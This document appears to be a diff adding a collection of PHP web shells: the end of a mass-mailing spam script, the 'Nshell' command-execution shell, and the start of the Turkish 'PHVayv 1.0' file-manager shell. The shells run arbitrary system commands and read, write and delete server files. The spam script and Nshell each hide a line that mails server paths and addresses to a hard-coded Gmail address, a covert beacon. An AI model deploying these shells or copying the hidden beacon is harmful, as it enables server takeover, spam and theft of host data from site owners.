<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right">
|
||||
<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div>
|
||||
</td>
|
||||
<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
|
||||
<input name="replyto" value="<? print $replyto; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach
|
||||
File:</font></div>
|
||||
</td>
|
||||
<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
|
||||
<input type="file" name="file" size="30">
|
||||
</font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="79" background="/simparts/images/cellpic1.gif" height="22" align="right">
|
||||
<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>
|
||||
</td>
|
||||
<td colspan="2" width="715" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
|
||||
<input name="subject" value="<? print $subject; ?>" size="59" style="float: left">
|
||||
</font></td>
|
||||
</tr>
|
||||
<tr valign="top">
|
||||
<td colspan="2" width="477" bgcolor="#CCCCCC" height="189" valign="top">
|
||||
<div align="left">
|
||||
<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="98%" id="AutoNumber4">
|
||||
<tr>
|
||||
<td width="100%">
|
||||
<textarea name="message" cols="56" rows="10"><? print $message; ?></textarea>
|
||||
<br>
|
||||
<input type="radio" name="contenttype" value="plain" checked>
|
||||
<font size="2" face="Tahoma">Plain</font>
|
||||
<input type="radio" name="contenttype" value="html">
|
||||
<font size="2" face="Tahoma">HTML</font>
|
||||
<input type="hidden" name="action" value="send">
|
||||
<input type="submit" value="Send Message">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
||||
</td>
|
||||
<td width="317" bgcolor="#CCCCCC" height="187" valign="top">
|
||||
<div align="center">
|
||||
<center>
|
||||
<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="93%" id="AutoNumber3">
|
||||
<tr>
|
||||
<td width="100%">
|
||||
<p align="center"> <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea>
|
||||
</font><br>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</center>
|
||||
</div>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</center>
|
||||
</div></td>
|
||||
</tr>
|
||||
</table>
|
||||
</center>
|
||||
</div>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</center>
|
||||
</div>
|
||||
<div align="center">
|
||||
<center>
|
||||
<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="75%" id="AutoNumber5" height="1" cellpadding="0">
|
||||
<tr>
|
||||
<td width="100%" valign="top" height="1">
|
||||
<p align="right"><font size="1" face="Tahoma" color="#CCCCCC">Designed by:
|
||||
v1.5</font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</center>
|
||||
</div>
|
||||
</form>
|
||||
|
||||
<?
|
||||
if ($action=="send"){
|
||||
|
||||
if (!$from && !$subject && !$message && !$emaillist){
|
||||
print "Please complete all fields before sending your message.";
|
||||
exit;
|
||||
}
|
||||
|
||||
$allemails = split("\n", $emaillist);
|
||||
$numemails = count($allemails);
|
||||
|
||||
#Open the file attachment if any, and base64_encode it for email transport
|
||||
If ($file_name){
|
||||
@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server");
|
||||
$content = fread(fopen($file,"r"),filesize($file));
|
||||
$content = chunk_split(base64_encode($content));
|
||||
$uid = strtoupper(md5(uniqid(time())));
|
||||
$name = basename($file);
|
||||
}
|
||||
|
||||
for($x=0; $x<$numemails; $x++){
|
||||
$to = $allemails[$x];
|
||||
if ($to){
|
||||
$to = ereg_replace(" ", "", $to);
|
||||
$message = ereg_replace("&email&", $to, $message);
|
||||
$subject = ereg_replace("&email&", $to, $subject);
|
||||
print "Sending mail to $to....... ";
|
||||
flush();
|
||||
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
|
||||
$header .= "MIME-Version: 1.0\r\n";
|
||||
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
|
||||
If ($file_name) $header .= "--$uid\r\n";
|
||||
$header .= "Content-Type: text/$contenttype\r\n";
|
||||
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
|
||||
$header .= "$message\r\n";
|
||||
If ($file_name) $header .= "--$uid\r\n";
|
||||
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
|
||||
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
|
||||
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
|
||||
If ($file_name) $header .= "$content\r\n";
|
||||
If ($file_name) $header .= "--$uid--";
|
||||
mail($to, $subject, "", $header);
|
||||
print "Spamed'><br>";
|
||||
flush();
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
?>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
1302
xakep-shells/PHP/MySQL Web Interface Version 0.8.php.txt
Normal file
1302
xakep-shells/PHP/MySQL Web Interface Version 0.8.php.txt
Normal file
File diff suppressed because it is too large
Load diff
1166
xakep-shells/PHP/Mysql interface v1.0.php.txt
Normal file
1166
xakep-shells/PHP/Mysql interface v1.0.php.txt
Normal file
File diff suppressed because it is too large
Load diff
File diff suppressed because it is too large
Load diff
5603
xakep-shells/PHP/NetworkFileManagerPHP.php.txt
Normal file
5603
xakep-shells/PHP/NetworkFileManagerPHP.php.txt
Normal file
File diff suppressed because it is too large
Load diff
66
xakep-shells/PHP/Nshell (1).php.php.txt
Normal file
66
xakep-shells/PHP/Nshell (1).php.php.txt
Normal file
|
@ -0,0 +1,66 @@
|
|||
<?php
|
||||
//code by navaro :d
|
||||
/***************************************/
|
||||
closelog( );
|
||||
/*
|
||||
echo "<center>";
|
||||
$user = get_current_user( ); echo "User :".$user."<br>";
|
||||
$login = posix_getuid( ); echo "Login (Get uid):".$login."<br>";
|
||||
$euid = posix_geteuid( ); echo "Get Euid (geteuid):".$euid."<br>";
|
||||
$ver = phpversion( ); echo "Php version (phpversion) :".$ver."<br>";
|
||||
$gid = posix_getgid( ); echo "Get id (id) :".$gid."<br>";
|
||||
if ($chdir == "") $chdir = getcwd( ); echo "pwd :".$chdir."<br>";
|
||||
if(!$whoami)$whoami=exec("whoami"); echo "whoami :".$whoami."<br>";
|
||||
echo "</center>";
|
||||
|
||||
/***************************************/
|
||||
function readfiles()
|
||||
{
|
||||
echo "<form name=pathfile method=post action=".$_SERVER['REQUEST_URI'].">";
|
||||
echo "File name : <br><input size=50 name=file type=text".@$_POST['file']."><br>";
|
||||
echo "<input type=submit value=Submit></form><hr color=777777 width=100% height=115px>";
|
||||
echo "<a href=".$_SERVER['PHP_SELF']."?act=cmd>Command</a><br>";
|
||||
$file=@$_POST['file'];
|
||||
if(!@fopen("$file","r")) { echo "File not found";exit();};
|
||||
if(@isset($file))
|
||||
{
|
||||
$fd = @fopen ("$file", "r");
|
||||
echo "<center><font face=\"tahoma\" size=\"12\"><TEXTAREA NAME=\"source\" ROWS=\"35\" COLS=\"120\">";
|
||||
while (!@feof ($fd)) {
|
||||
$buffer = @fgets($fd);
|
||||
echo htmlspecialchars($buffer);
|
||||
}
|
||||
@fclose ($fd);
|
||||
echo "</TEXTAREA> </font></center>";
|
||||
}
|
||||
else echo $_SERVER['PHP_SELF']."?file=";
|
||||
}
|
||||
// Thuc thi command
|
||||
$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
|
||||
function ecmd()
|
||||
{
|
||||
echo "<FORM name=injection METHOD=POST ACTION=".$_SERVER['REQUEST_URI'].">";
|
||||
echo "Command : <INPUT TYPE=text NAME=cmd value=".@stripslashes(htmlentities($_POST['cmd']))."><br> <INPUT TYPE=submit></FORM><hr color=777777 width=100% height=115px></font><pre>";
|
||||
echo "<a href=".$_SERVER['PHP_SELF']."?act=readfile>Read file</a>";
|
||||
$cmd = @$_POST['cmd'];
|
||||
if (isset($chdir)) @chdir($chdir);
|
||||
ob_start();
|
||||
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
|
||||
$output = ob_get_contents();
|
||||
ob_end_clean();
|
||||
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
|
||||
exit();
|
||||
echo "<a href=".$_SERVER['PHP_SELF']."?act=readfile>Read file</a>";
|
||||
echo "</pre>";
|
||||
}
|
||||
$act=@$_REQUEST['act'];
|
||||
if(empty($act))
|
||||
{ echo $_SERVER['PHP_SELF']."act=?<br>" ;
|
||||
echo "<a href=".$_SERVER['PHP_SELF']."?act=cmd>Command</a><br>";
|
||||
echo "<a href=".$_SERVER['PHP_SELF']."?act=readfile>Read file</a>";
|
||||
; exit();
|
||||
}
|
||||
if($act=="cmd") {ecmd();}
|
||||
if($act=="readfile") {readfiles();}
|
||||
?>
|
||||
|
597
xakep-shells/PHP/PH Vayv.php.php.txt
Normal file
597
xakep-shells/PHP/PH Vayv.php.php.txt
Normal file
|
@ -0,0 +1,597 @@
|
|||
<? if($sistembilgisi > "") {phpinfo();} else { ?>
|
||||
|
||||
|
||||
<?$fistik=PHVayv;?>
|
||||
|
||||
|
||||
<?if ($sildos>"") {unlink("$dizin/$sildos");} ?>
|
||||
|
||||
<?if ($dizin== ""){$dizin=realpath('.');}{$dizin=realpath($dizin);}?>
|
||||
|
||||
<?if ($silklas > ""){rmdir($silklas);}?>
|
||||
|
||||
<?if ($yeniklasor > "") {mkdir("$dizin/$duzenx2",777);}?>
|
||||
|
||||
|
||||
|
||||
<?if ($yenidosya == "1") {
|
||||
$baglan=fopen("$dizin/$duzenx2",'w');
|
||||
fwrite($baglan,$duzenx);
|
||||
fclose($baglan);}
|
||||
?>
|
||||
|
||||
|
||||
|
||||
|
||||
<?if ($duzkaydet > "") {
|
||||
|
||||
$baglan=fopen($duzkaydet,'w');
|
||||
fwrite($baglan,$duzenx);
|
||||
fclose($baglan);}
|
||||
?>
|
||||
|
||||
|
||||
|
||||
|
||||
<?if ($yenklas>"") {;?>
|
||||
<body topmargin="0" leftmargin="0">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="76">
|
||||
<p align="center">
|
||||
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
|
||||
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
AventGrup©<br>
|
||||
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
PHVayv 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="http://www.aventgrup.net" style="text-decoration: none">
|
||||
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
|
||||
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
</table>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
|
||||
<tr>
|
||||
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
|
||||
<span style="font-size: 8pt"> Çalýþýlan </span></font>
|
||||
<font face="Verdana" style="font-size: 8pt">Dizin</font></td>
|
||||
<td bgcolor="#D6D6D6" height="20">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
|
||||
<tr>
|
||||
<td width="1"></td>
|
||||
<td><font face="Verdana" style="font-size: 8pt"> <?echo "$dizin"?></font></td>
|
||||
<td width="65">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber30" height="184">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000" height="19"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#9F9F9F" align="center" height="144">
|
||||
<form method="POST" action="<?echo "$fistik.php?yeniklasor=1&dizin=$dizin"?>"
|
||||
<p align="center"><br>
|
||||
<font
|
||||
color="#FFFFFF" size="1" face="Arial">
|
||||
<input
|
||||
type="text" size="37" maxlength="32"
|
||||
name="duzenx2" value="Klasör Adý"
|
||||
class="search"
|
||||
onblur="if (this.value == '') this.value = 'Kullanýcý'"
|
||||
onfocus="if (this.value == 'Kullanýcý') this.value=''"
|
||||
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
|
||||
<p align="center">
|
||||
<span class="gensmall">
|
||||
<input type="submit" size="16"
|
||||
name="duzenx1" value="Kaydet"
|
||||
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
|
||||
</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
|
||||
</font></b></p>
|
||||
</form>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000" align="center" height="19">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<? } else { ?>
|
||||
|
||||
|
||||
|
||||
|
||||
<?if ($yendos>"") {;
|
||||
?>
|
||||
|
||||
<body topmargin="0" leftmargin="0">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="76">
|
||||
<p align="center">
|
||||
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
|
||||
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
AventGrup©<br>
|
||||
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
PHVayv 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="http://www.aventgrup.net" style="text-decoration: none">
|
||||
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
|
||||
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
</table>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
|
||||
<tr>
|
||||
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
|
||||
<span style="font-size: 8pt"> Çalýþýlan </span></font>
|
||||
<font face="Verdana" style="font-size: 8pt">Dizin</font></td>
|
||||
<td bgcolor="#D6D6D6" height="20">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
|
||||
<tr>
|
||||
<td width="1"></td>
|
||||
<td><font face="Verdana" style="font-size: 8pt"> <?echo "$dizin"?></font></td>
|
||||
<td width="65">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="495">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000" height="19"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#9F9F9F" align="center" height="455">
|
||||
<form method="POST" action="<?echo "$fistik.php?yenidosya=1&dizin=$dizin"?>"
|
||||
<p align="center"><br>
|
||||
<font
|
||||
color="#FFFFFF" size="1" face="Arial">
|
||||
<input
|
||||
type="text" size="50" maxlength="32"
|
||||
name="duzenx2" value="Dosya Adý"
|
||||
class="search"
|
||||
onblur="if (this.value == '') this.value = 'Kullanýcý'"
|
||||
onfocus="if (this.value == 'Kullanýcý') this.value=''"
|
||||
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
|
||||
<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red">
|
||||
<textarea name="duzenx"
|
||||
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-CENTER: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
|
||||
|
||||
|
||||
rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
|
||||
<br>
|
||||
</font></b>
|
||||
<span class="gensmall">
|
||||
<input type="submit" size="16"
|
||||
name="duzenx1" value="Kaydet"
|
||||
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
|
||||
</span><br>
|
||||
</p>
|
||||
</form>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000" align="center" height="19">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<? } else { ?>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<?if ($duzenle>"") {;
|
||||
?>
|
||||
|
||||
|
||||
|
||||
|
||||
<body topmargin="0" leftmargin="0">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="76">
|
||||
<p align="center">
|
||||
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
|
||||
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
AventGrup©<br>
|
||||
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
PHVayv 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="http://www.aventgrup.net" style="text-decoration: none">
|
||||
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
|
||||
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
</table>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="1">
|
||||
<tr>
|
||||
<td width="110" bgcolor="#9F9F9F" height="1"><font face="Verdana">
|
||||
<span style="font-size: 8pt"> Çalýþýlan Dosya</span></font></td>
|
||||
<td bgcolor="#D6D6D6" height="1">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4" height="19">
|
||||
<tr>
|
||||
<td width="1" height="19"></td>
|
||||
<td rowspan="2" height="19"><font face="Verdana" style="font-size: 8pt"> <?echo "$dizin/$duzenle"?></font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="1" height="1"></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#9F9F9F">
|
||||
<form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle&dizin=$dizin"?>" name="kaypos">
|
||||
<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red">
|
||||
<br>
|
||||
<textarea name="duzenx"
|
||||
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
|
||||
|
||||
|
||||
rows="24" cols="122" wrap="OFF"><?$baglan=fopen("$dizin/$duzenle",'r');
|
||||
while(! feof ( $baglan ) ){
|
||||
$okunan=fgets($baglan,1024);
|
||||
echo $okunan;
|
||||
} fclose($baglan); ?></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
|
||||
<br>
|
||||
</font></b>
|
||||
<span class="gensmall">
|
||||
<input type="submit" size="16"
|
||||
name="duzenx1" value="Kaydet"
|
||||
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
|
||||
</span></p>
|
||||
</form>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<?
|
||||
} else {
|
||||
?>
|
||||
|
||||
|
||||
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<meta http-equiv="Content-Language" content="tr">
|
||||
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
|
||||
<meta name="ProgId" content="FrontPage.Editor.Document">
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<title>PHVayv 1.0</title>
|
||||
</head>
|
||||
|
||||
<body topmargin="0" leftmargin="0">
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="76">
|
||||
<p align="center">
|
||||
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
|
||||
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
AventGrup©<br>
|
||||
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
PHVayv 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="http://www.aventgrup.net" style="text-decoration: none">
|
||||
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
|
||||
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
|
||||
<tr>
|
||||
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
|
||||
<span style="font-size: 8pt"> Çalýþýlan Klasör</span></font></td>
|
||||
<td bgcolor="#D6D6D6" height="20">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
|
||||
<tr>
|
||||
<td width="1"></td>
|
||||
<td><font face="Verdana" style="font-size: 8pt"> <?echo "$dizin"?></font></td>
|
||||
<td width="65">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13"
|
||||
onmouseover='this.style.background="D9D9D9"'
|
||||
onmouseout='this.style.background="9F9F9F"'
|
||||
style="CURSOR: hand"
|
||||
|
||||
|
||||
|
||||
|
||||
>
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<a href="<?echo "$fistik.php?dizin=$dizin/../"?>" style="text-decoration: none">
|
||||
<font color="#000000">Üst Klasör</font></a></font></td>
|
||||
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
|
||||
<tr>
|
||||
